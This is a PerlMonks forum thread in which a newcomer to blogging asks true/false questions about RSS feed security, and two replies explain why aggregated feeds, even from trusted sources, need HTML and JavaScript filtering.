BlenderHead has asked for the wisdom of the Perl Monks concerning the following question:

Hello World:

This is a follow through question to my post over here:

http://www.perlmonks.org/?node_id=807880

I typically use forums and mailing list for discussion, and I am not an experienced blogger. I'd like to try some blogging with RSS, however, so please excuse if these questions sound naive. Just trying to keep things safe.

1 - TRUE or FALSE: The RSS security problems people explained in response to my previous post seem only to pertain to incoming (i.e. aggregated) data. In other words, I can still generate any kind of feed I want without compromising security, right?

2 - TRUE OR FALSE: As per aggregating from various feeds, I can choose which feeds to subscribe to, so it would seem that if the feed is a trusted source (e.g. like another one of your own sites), then one could aggregate off of those feeds without having to worry about hostile content. Is that correct?

3 - TRUE OR FALSE: If one is going to aggregate information from a relatively unknown source, then one is going to want to make sure your RSS aggregator scripts filter out anything but the most basic HTML tags.

The benefit in these questions seems to be that - if they are true - 1.) one can still create any kind of feed one wants, even allowing others to read it, and 2.) also one can propound any kind of trusted aggregated information, but, if the source isnt well known, then to program the aggregator to filter out hostile content.

Like I said, I am new to blogging, but it sounds like RSS is both fun and useful, so any help is much is much appreciated.

TIA!

BH

Replies are listed 'Best First'.
Re: RSS & Security (Follow Up Question)
by bellaire (Hermit) on Nov 23, 2009 at 13:12 UTC
    If I'm reading all this correctly, the responses depend heavily on how you intepret your statements.
    1. TRUE, if and only if "any kind of content you want" is free of javascript (to protect your users), and you aren't inadvertently passing session data in the HTTP_HEADERS in the aggregation (to protect yourself). Otherwise FALSE.
    2. TRUE, if and only if you assume "trusted sources" to be incapable of generating hostile content under any circumstances. Some people would never make that assumption. If you don't make that assumption, this becomes FALSE.
    3. TRUE. This is also true for sites that aren't "relatively unknown".
[reply]
Re: RSS & Security (Follow Up Question)
by ww (Archbishop) on Nov 23, 2009 at 13:36 UTC
    1. TRUE so long as the only content is that you've created... and you trust your skills to ensure that you don't create anything that's "compromising security."
    2. FALSE because even a "trusted source" can be compromised.
    3. TRUE but, taken literally, that means you have to create means to handle (for example) reformatting to preserve the information provided by tags excluded from your definition of "basic."

    In any case, your penultimate paragraph references the major challenge: "to program the aggregator to (INSERT: recognize and ) filter out hostile content."

    Update: Reformatted last para above; added INSERT

[reply]

Back to Seekers of Perl Wisdom